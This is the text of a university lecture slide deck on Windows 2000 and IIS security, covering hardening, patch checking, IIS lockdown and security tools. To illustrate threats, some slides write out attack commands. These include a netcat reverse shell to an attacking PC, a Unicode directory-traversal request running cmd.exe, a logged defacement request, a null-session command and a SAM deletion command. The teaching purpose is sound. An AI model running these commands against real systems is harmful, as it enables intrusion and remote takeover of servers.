Windows 2000 Security

Matthew Cook
Loughborough University
http://www.escarpment.net/

1
 Introduction

Loughborough University
http://www.lboro.ac.uk/computing/

Janet Web Cache Service

http://wwwcache.ja.net

2
 Security @ Lboro
✦ Evaluation of Security Service/Policy
✦ Demand for Windows and Linux security
advice
✦ Need for other OS security advice

✦ Installation of Internet Facing Windows

2000 systems.

3
 Windows 2000 Security
✦ Overview of General Security Threats
✦ Workstation Security

✦ Server Security

✦ IIS Security

✦ Security Tools

✦ Questions and Answers

4
 Physical Security

"The only system which is truly

secure is one which is switched off
and unplugged, locked in a titanium
lined safe, buried in a concrete
bunker, and is surrounded by …
very highly paid armed guards. Even
then, I wouldn't stake my life on it."
Gene Spafford

5
 Security Threats
✦ Denial of Service
✦ Theft of information

✦ Modification

✦ Fabrication (Spoofing or Masquerading)

6
 Security Holes
✦ Physical Security Holes
✦ Software Security Holes

✦ Incompatible Usage Security Holes

✦ Social Engineering

✦ Complacency

7
Workstation Security

Security for General Workstations

8
 Workstation Security
✦ Physical Security
✦ BIOS
✦ Service Packs and Hot fixes
✦ NTFS ACLS
✦ Policies and Profiles
✦ Security Templates
✦ Auditing
✦ Threats
9
Service Packs and Hot fixes
✦ Ensure you have the latest ‘evaluated’
service packs and hot fixes.
✦ Check the model periodically

✦ Hfnetchk Tool

10
 NTFS ACLS
✦ Ensure you use NTFS
✦ Partition your drives per application

✦ Use xcacls from the Resource Kit

✦ Script NTFS security

✦ Set using Security Templates

✦ Example

11
 Policies and Profiles
✦ NT Policy files are different to GPO (Group
Policy Objects) in Windows 2000
✦ LGPO located in:
%windir%\system32\grouppolicy
✦ ADGPO located in:
%windir%\system32\sysvol\camford\policies
✦ Demonstration

12
 Security Templates
✦ Use ‘Security Settings’ applet to apply
✦ Located in %windir%\security\templates

✦ Quick and Easy to apply

✦ Templates are accumulative

✦ Demonstration

13
 Security Templates…
✦ Setup security – Default settings
✦ Compatws – Compatible

✦ Basicdc/sv/wk – Basic Security

✦ Securedc/wk – More Secure

✦ Hisecdc/ws – Further Security

✦ Ocfiless/w – Optional Components

14
 Auditing & Event Logs
✦ Use the ‘Security Settings’ applet to ensure
the Audit Policy has been configured
✦ Check the Event Viewer regularly

✦ Or Use NTLast (Foundstone)

✦ URL: http://www.foundstone.com/

✦ Or ELM (TNT Software)

✦ URL: http://www.tntsoftware.com/

15
 Threats
✦ PipeUpAdmin and PipeUpSAM
✦ Netddemsg

✦ EFS

✦ DOS Boot disc

✦ Linux Boot disc

✦ BIOS Passwords

16
PipeUpAdmin & PipeUpSAM
✦ Uses vulnerability in Named Pipes in the
Service Control Manger (SCM)
✦ Adds user to Administrator Group

✦ Patch Bulletin: MS00-053

✦ URL: http://www.dogmile.com/files/

17
 Netddemsg
✦ Uses vulnerability in NetDDE
✦ Provides cmd in SYSTEM context

✦ Patch Bulletin: MS01-007

✦ NOT included in Windows 2000 SP2

18
 EFS
✦ Changing the password of the recovery
agent. (Administrator)
✦ Changing the password of the user

✦ EFS temporary files

19
 DOS Boot Disc
✦ DOS NTFS drivers bypass NTFS ACLS
✦ Allows removal of the SAM
del %windir%\system32\config\sam
✦ Allows extraction of the SAM
✦ URL: http://www.sysinternals.com/
✦ URL:
http://www.esiea.fr/public_html/Christophe.GRE
NIER/

20
 Linux Boot Disc
✦ Edit SAM password hashes
✦ Disable SYSKEY

✦ Limited SCSI support

✦ URL: http://home.eunet.no/~pnordahl/

21
 BIOS Passwords
✦ Even a BIOS password is not secure
✦ Check for vulnerabilities

✦ Check for Default Passwords

✦ Upgrade BIOS

✦ URL:
http://www.esiea.fr/public_html/Christophe.GRE
NIER/

22
 Server Security

Security for Internet Facing Servers

23
 Server Security
✦ Advice for Workstation Security
✦ NetBIOS/SMB Services

✦ Hfnetchk and Qchain

✦ SNMP Vulnerabilities

✦ Active Directory Vulnerabilities

✦ IPSec

24
 NetBIOS/SMB Services
✦ NetBIOS Name Service [Port UDP 137]
✦ NetBIOS Session Service [Port TCP 139]

✦ SMB over TCP [Port 445]

✦ Port 445 Windows 2000 only

✦ Block TCP/UDP 135-139 and 445 at the

firewall

25
 NetBIOS/SMB Services…

Null Authentication:
Net use \\camford\IPC$ “” /u:“”
✦ Famous tools like ‘Red Button’

Net view \\camford

✦ Investigate srvcheck and srvinfo in the
Resouce Kit

26
 NetBIOS/SMB Services…
✦ Dumpsec from Somarsoft
✦ URL: http://www.somarsoft.com

✦ Enum from Razor

✦ URL: http://razor.bindview.com/

✦ A Google search reveals many, many more

27
 NetBIOS/SMB Services…

To disable NetBIOS
2. Select ‘Disable NetBIOS’ in the WINS
tab of advanced TCP/IP properties.
3. Deselect ‘File and Print sharing’ in the
advanced settings of the ‘Network and
Dial-up connections’ window

28
 NetBIOS/SMB Services…

Disable Null Authentication

✦ Key similar to Windows NT 4.0
✦ HKLM\SYSTEM\CurrentControlSet\Control\LSA
\RestrictAnonymous
✦ REG_DWORD set to 0, 1 or 2!
✦ HKLM\SYSTEM\CurrentControlSet\Control\Sec
urePipeServers\RestrictAnonymous
✦ REG_DWORD set to 0 or 1
29
 Hfnetchk
✦ Use Hfnetchk to check hot fixes
✦ Checks machines against Microsoft XML

✦ Automate the process using a batch files

and a mail client (Postie)
✦ URL: http://www.infradig.com/infradig/postie/

✦ Use QChain to chain hot fixes together

without rebooting in-between.

30
 Hfnetchk…

Patch details for:

✦ Windows NT 4.0 and Windows 2000

✦ IIS 4 and IIS 5

✦ SQL Server 7.0

✦ SQL Server 2000

✦ Internet Explorer 5.01 (and later)

31
 Hfnetchk…
✦ Default scan of local host (Pre downloaded)
hfnetchk –x mssecure.xml
✦ Default scan of lboro domain
hfnetchk –d lboro
✦ Verbose scan of local host
hfnetchk –v –x mssecure.xml
✦ Verbose scan including installed hot fixes
hfnetchk –v –a b –x mssecure.xml

32
 Hfnetchk…
✦ Test problems
hfnetchk –z –v –x mssecure.xml
✦ XML File Download
http://download.microsoft.com/download/xml
/security/1.0/nt5/en-us/mssecure.cab
✦ Using an internal copy of the XML
hfnetchk –x http://camford.ac.uk/mssecure.xml
hfnetchk –x s:\camford\mssecure.xml

33
 QChain

Supported by:
✦ Windows NT 4.0

✦ Windows 2000

✦ Windows XP (25th October 2001)

34
 QChain…
✦ Run the hot fix with –z (No reboot) and –m
(Quiet mode)
✦ Run qchain and then reboot
✦ Create a log using qchain [logname]
✦ Create batch files on a central server
✦ URL:
http://www.microsoft.com/Downloads\Release.as
p?ReleaseID=29821

35
 SNMP Vulnerabilities
✦ Simple Network Management Protocol
✦ Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25
✦ SNMP Utilities in Resource Kit
✦ Turn off SNMP services

✦ Set community names

✦ Set accepted hosts

36
SNMP Vulnerabilities…

37
 AD Vulnerabilities
✦ Listing of AD contents using ldp.exe
✦ Ldp is contained on the Resource Kit

✦ Authenticated connection needed

✦ Filter TCP 389 (LDAP) and 3268 (GC)

✦ DNS – Securing Zone Transfers to Slave

Name servers only

38
 IPSec
✦ Currently investigating
✦ Linux Connectivity using FreeS/WAN

✦ Mainly for wireless use

✦ WEP encryption cracked

✦ URL: http://www.freeswan.org/

✦ URL: http://airsnort.sourceforge.net/

39
 IIS Security

Internet Information Server

40
 IIS Security
✦ History
✦ Recent Worms

✦ IIS Lock Down Tool

✦ URL Scan

✦ The Future

41
 IIS History
✦ IIS 2.0 Installed by NT 4.0
✦ IIS 3.0 followed by more common IIS 4.0

✦ Quickly gained reputation for (in)security

✦ IIS 5.0 Installed by Windows 2000

✦ Microsoft releases Hfnetchk

✦ Closely followed by IIS Lockdown and

URLScan
42
 Recent Worms
✦ Sadmind/IIS
Directory Traversal (Unicode Exploit)
✦ CodeRed
ida/idq buffer overflow
✦ CodeGreen
ida/idq buffer overflow
✦ Nimda
Directory Traversal (Unicode Exploit)
43
 Sadmind/IIS
✦ 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80
GET /scripts/root.exe
/c+echo+^<html^>^<body+bgcolor%3Dblack^>^
<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table
+width%3D100%^>^<td^>^<p+align%3D%22ce
nter%22^>^<font+size%3D7+color%3Dred^>f**
*+USA+Government^</font^>^<tr^>^<td^>^<p+
align%3D%22center%22^>^<font+size%3D7+col
or%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+a
lign%3D%22center%22^>^<font+size%3D4+colo
r%3Dred^>contact:sysadmcn@yahoo.com.cn^</h
tml^>>../wwwroot/default.htm 200 -
44
 System Attacks
✦ Monday Morning Phone Call
✦ Perl Script ‘unicodeloader’

✦ http://camford/scripts/upload.asp

✦ http://camford/scripts/cmdasp.asp

✦ Sadmind/IIS worm and unicodeloader kit

✦ GET /scripts/../../winnt/system32/cmd.exe
/c+dir 200 –
✦ URL: http://www.sensepost.com/
45
 System Attacks…
✦ Obtaining a remote shell
✦ Attacking PC:
nc –l –p 1234
✦ Camford:
nc.exe –v –e cmd.exe <attackingpc> 1234
✦ URL: http://www.atstake.com/research/tools/

46
 System Attacks…
✦ Shell is in the context of IUSR_camford
✦ ISAPI.dll – RevertToSelf (Horovitz)
✦ Upload using upload.asp
✦ http://camford/scripts/idq.dll
✦ Version 2 coded by Foundstone
✦ http://camford/scripts/idq.dll?
✦ Patch Bulletin: MS01-26
✦ NOT included in Windows 2000 SP2
47
 IIS Lock Down Tool
✦ Automatic ‘Lock Down’
✦ Locks down IIS 4.0 and IIS 5.0
✦ Express ‘lock down’ for simple web sites
✦ Custom ‘lock down’ for more complex
servers
✦ Undo facility to reverse last ‘lock down’
✦ URL:
http://www.microsoft.com/Downloads\Release.as
p?ReleaseID=32362
48
 IIS Lock Down Tool…

Disable: Remove:
✦ Active Server Pages ✦ Sample Web Files
✦ Script Virtual
✦ Index Server Interface
Directory
✦ Server Side Includes
✦ MSADC Directory
✦ Internet Data
✦ WebDAV
Connector
Set Permissions on:
✦ Internet Printing
✦ Exe files
✦ HTR Scripting
✦ Content Directories

49
 URL Scan
✦ ISAPI filter scans incoming HTTP requests
✦ Filtered based on rule set
✦ New rules easily added
✦ Default urlscan.ini suitable for static pages
✦ Restart service when changes made
✦ 404 and logged request for matched rules
✦ URL:
http://www.microsoft.com/Downloads\Release.as
p?ReleaseID=32571
50
 URL Scan…

Filter on:
✦ The request method (verb)

✦ File Extension

✦ URL Encoding

✦ Non ASCII characters

✦ Malicious character sequence

✦ Headers in HTTP GET

51
 The Future
✦ Gartner report recommends ditching IIS
✦ Rewrite of IIS on the cards for version 6

✦ Lock Down Tool (Interim Measures)

✦ Httpd functionality in the kernel (TechEd)

✦ IIS Lockdown included in SP3

✦ Further implications for .NET

52
 Security Tools

A look at the freeware and

‘pay for’ tools available.

53
 Security Tools
✦ Snort
✦ CIS and Typhon
✦ Pwdump
✦ Fport
✦ L0pht Crack
✦ Nmap
✦ Nessus
✦ Pandora
54
 Snort
✦ IDS – Intrusion Detection System
✦ Libpcap packet sniffer and logger

✦ Originally developed for the Unix platforms

✦ Open Source

✦ Port to Win32 available (Release 1.8.1)

✦ Installation on Win32 in under 30 minutes

✦ Run on your IIS server or standalone

55
 Snort…

Snort can detect:

✦ Stealth Port Scans
✦ CGI Attacks
✦ Front Page Extensions Attacks
✦ ICMP Activity
✦ SMTP Activity
✦ SQL Activity
✦ SMB Probes
56
 Snort…
✦ Default logging to snort\logs\alert.ids
✦ Log to mySQL and SQL Server
✦ Notification as logs, ‘winpopup’, email etc
✦ SnortSnaf or ACID (PHP Based)
✦ GUI – IDS Center
✦ URL: http://snort.sourcefire.com/
✦ URL: http://www.cert.org/kb/acid/
✦ URL: http://www.silicondefense.com/
57
Snort…

58
 CIS and Typhon
✦ Typhon, formally Cerberus Internet Scanner
✦ Written by David Litchfield

✦ URL: http://www.nextgenss.com/

✦ Demonstration

59
 CIS and Typhon
✦ Web Checks ✦ SNMP Checks
✦ FTP Checks ✦ RPC Checks
✦ SMTP Checks ✦ Portscan (TCP/UDP)
✦ POP3 Checks ✦ Finger Checks
✦ NT Checks ✦ DNS Checks
✦ NetBIOS Checks
✦ MS SQL Checks ✦ Commercial Version

60
 Pwdump
✦ Version 3 (e = encrypted)
✦ Developed by Phil Staubs and Erik
Hjelmstad
✦ Based on pwdump and pwdump2

✦ URL: http://www.ebiz-
tech.com/html/pwdump.html

61
 Pwdump…
✦ Needs Administrative Privilidges
✦ Extracts hashs even if syskey is installed

✦ Extract from remote machines

✦ Identifies accounts with no password

✦ Self contained utility

62
 Fport
✦ Reports on all open TCP and UDP ports
✦ Maps Port to Application

✦ Requires psapi.dll (Windows NT 4.0)

✦ URL: http://www.foundstone.com/

✦ Demonstration

63
 L0pht Crack
✦ Password Auditing and Recovery
✦ Crack Passwords from many sources

✦ Registration $249

✦ URL: http://www.atstake.com/research/lc3/

✦ Demonstration

64
 L0pht Crack…

Crack Passwords from:

✦ Local Machine

✦ Remote Machine

✦ SAM File

✦ SMB Sniffer

✦ PWDump file

65
 Nmap
✦ Port Scanning Tool
✦ Stealth scanning, OS Fingerprinting

✦ Open Source

✦ Runs under Unix based OS

✦ Port development for Win32

✦ URL: http://www.insure.org/nmap/

66
Nmap…

67
 Nessus
✦ Remote security scanner similar to Typhon
✦ Very comprehensive

✦ Frequently updated modules

✦ Testing of DoS attacks

✦ Open Source

✦ Win32 and Java Client

✦ URL: http://nessus.org/

68
 Pandora
✦ Not strictly Windows 2000 Security
✦ Runs on either Unix or Win32

✦ Excellent tool to evaluate Netware security

✦ Open Source

✦ Lots of additional information

✦ URL: http://www.nmrc.org/pandora/

69
Questions and Answers

70